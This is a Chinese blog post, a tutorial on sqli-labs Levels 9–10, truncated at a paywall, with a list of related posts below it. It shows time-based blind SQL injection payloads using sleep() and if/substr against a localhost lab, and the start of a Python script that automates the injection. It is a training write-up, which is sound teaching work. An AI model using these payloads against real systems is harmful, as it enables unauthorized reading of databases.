sqli-labs第九关&第十关(延时盲注)

最新推荐文章于 2024-05-18 15:04:49 发布
最新推荐文章于 2024-05-18 15:04:49 发布
阅读量1.1k 收藏 8
点赞数 4
分类专栏: sqliabs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42266432/article/details/119814142
版权

刚开始进入这一关时对这一关进行了常规的注入过程,并未发现有可以利用的地方,然后怎么办呢?去作弊嘛,看了看标题,第九关叫"time based-single quotes"基于时间—单引号,于是乎,就去试了试时间盲注,使用单引号闭合,请求如下:

http://localhost:90/sqli-labs-master/Less-9/?id=1' and (select sleep(3))--+

然后发现这个请求延时了3S
在这里插入图片描述
进行到这里,就有了一套完整的思路,时间盲注和之前的布尔盲注思路差不多,布尔盲注靠UI界面的变化判断真假,延时盲注靠请求的延时发出判断真假,先手工注入一个:

http://localhost:90/sqli-labs-master/Less-8/?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='e',sleep(2),1)--+

在这里插入图片描述
可以看到,请求被延时了2S,可行
这里使用的if(expr1,expr2,expr3),expr1为真则执行2,为假则执行3,加上sleep方法即可让我们判断条件的真假,requests库中elapsed方法可返回响应时间,使用elapsed.total_seconds()得到响应时间单位为S,知道这些就可以写个简单的脚本自动注入,代码如下:

import requests


# 获取数据库名长度
def database_len():
    for i in range(1, 10):
        url = f"http://localhost:90/sqli-labs-master/Less-9/?id=1' and if(length(database())>{
     i},1,sleep(2))"
        r = requests.get(url + '%23')
        if r.elapsed.total_seconds()>2:
            print('database_length:', i)
            return i


#获取数据库名
def database_name(
最低0.47元/天 解锁文章
mmmmcq
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
sqli-labs-master Less1-9通代码详解
qq_42906381的博客
02-15 2652
sqli-labs 1-9 通代码详细
sqli靶场通之less9
sunxueer的博客
07-19 1226
sqli less9 时间盲注 结合burpsuite 1.不返回报错信息页面,无法进行基于报错信息的盲注。2.页面不存在true和false两种不同的页面,无法进行对比也就无法进行布尔盲注。一般来说,在页面没有任何回显和错误信息提示的时候,我们就会测试时间盲注这个手法。 1. 求闭合字符 id=1',1),1'),1"等都试过了,发现始终没有报错信息,猜测正确的输入和错误的输入返回的结果被设置成一样的了 查看源码,证实了猜测,尝试使用时间盲注 id=1 and sleep(5) //未延迟 i
详细sqli-labs(1-20)通讲解
最新发布
m0_57928318的博客
05-18 1064
获取数据库名时可以使用 left() 函数,这里使用 substr() 函数截取数据库名的每个字符,然后使用 ASCII() 函数判断这个字符的 ASCII 码值。我们可以看出,GET 方式和post 方式 的区别,GET方式 可以明显的 从 URL 中进行注入,POST可以在数据包中进行修改对应的字段来进行 SQL 注入。获取数据库名时,使用 LEFT() 函数进行穷举法的效率较低,使用 substr() 函数结合 ASCII() 函数进行判断可以使用二分法快速缩小范围。
sqli-labs第九
qq_56726035的博客
04-08 686
sqli-labs第九
sqli-labs通全解---盲注脚本的编写--less7-10-4
cyynid的博客
01-10 579
盲注
sqli-labs卡9(基于get提交的单引号闭合的时间盲注)通思路
zyh1588的博客
10-31 584
小白回顾sqli-labs靶场第九(时间盲注)
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
【针对sqli-labs第9时间盲注python脚本
AA8j的博客
09-09 705
效果图 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/7 10:20 # @Author : AA8j # @Site : # @File : Time-based-blind-SQL-injection.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import binascii import request
Sqli-labs 复习 Less09-10 延时sql盲注 - GET
kevinhanser
08-11 253
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 延时SQL 盲注 # 函数讲解 利用 sleep() 函数进行注入 ?id=1’ and if(ascii(substr(database(),1,1))=115,sleep(5),1)# ?id=1’ union select (if(substring(...
sqli-labs靶场第九
gou1791241251的博客
12-26 1513
传入id=1参数进行查看 传入单引号和双引号进行测试闭合方式 传入单引号时页面没反应,试一下双引号 还是没有反应!!!此时应该反应过来,可能页面没有布尔类型状态,只能尝试一下绝招(绝境才能用的招)延时注入 此时发现确实延迟了十秒页面才能正常响应,延时注入是布尔盲注的一种,如果条件正确就沉睡10秒,秒数可以自己自定义。 以下就不演示怎么获取数据库信息了,参考sqli-labs第六盲注,把条件换成沉睡10秒即可。 ...
sqli-labs 9~10 多命通攻略(Python3 自动化实现时间盲注
两个月亮
01-13 774
三种输入,sqli-labs 的回显区域显示的内容均,因此我们只能使用基于时间的注入方式。
延时盲注——sqli-labs第9、10
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-28 1765
目录使用场景第9确认场景判断闭合符找到数据库名的长度将数据库名一个字母一个字母爆出来…………第10 使用场景 1.对时间函数敏感 2.前端不显示后端报错和查询结果传来的结果,同时也不根据后端传来的结果显示不同的内容。 一些资料说是: 2.后端报错和查询结果不返回到前端,对前端其他任何输入都不返回给前端不同的内容 至于是后端不返回,还是返回了前端不显示,有点搞不懂,希望有大佬看到能帮我扫盲 基本函数: if(var1,var2,var3) var1:条件 var2:条件为真时返回的值 var3:条件为
盲注学习(sqli-labs 8(布尔盲注) 9(时间盲注))
筱阳的博客
06-06 1545
所以称为盲注是因为他不会根据你sql注入的攻击语句返回你想要知道的错误信息。盲注分为两类:    1.布尔盲注 布尔很明显Ture跟Fales,也就是说它只会根据    你的注入信息返回Ture跟Fales,也就没有了之前的报错信息。    2.时间盲注 界面返回值只有一种,true 无论输入任何值 返回情况都会按正常的来处理。加入特定的时间函数,通过查看web页面返回的时间差来判断注入的语句是否...
sqli labs 9 时间盲注
Xiaoxiaoqiang_的博客
03-01 267
小学僧
SQLI-Labs(3)8-14【布尔盲注时间盲注
weixin_52515588的博客
03-05 427
利用payload:' and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1【位数】,1【个数】)))=101--+那么时间盲注最大的问题就是我们没办法一开始就猜到闭合的规则,有可能试了半天他最后没有时间盲注,所以这里就考验的是心态。第十又是闭合的问题了。剩下的就跟之前是一样的了,在这里也不多说了,不知道的可以看之前的东西。
sqli-labs第九脚本解释
01-22
sqli-labs第九是一个延时盲注的挑战。在这个挑战中,你需要通过注入语句来判断条件是否为真,并通过延时来判断注入是否成功。 根据你提供的信息,你尝试了时间盲注的方法。你使用了单引号来闭合注入语句,并在其中使用了一个延时函数`sleep(3)`来延时3秒钟。你的请求如下: ``` http://localhost:90/sqli-labs-master/Less-9/?id=1' and (select sleep(3))--+ ``` 这个注入语句的意思是,如果条件为真,那么数据库会延时3秒钟返回结果。通过观察请求的响应时间,你可以判断注入是否成功。 在第十中,你需要使用双引号来闭合注入语句,并且要注意将字符串的双引号变成三引号,以避免闭合的双引号混入其中。 这是sqli-labs第九脚本解释。如果你有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值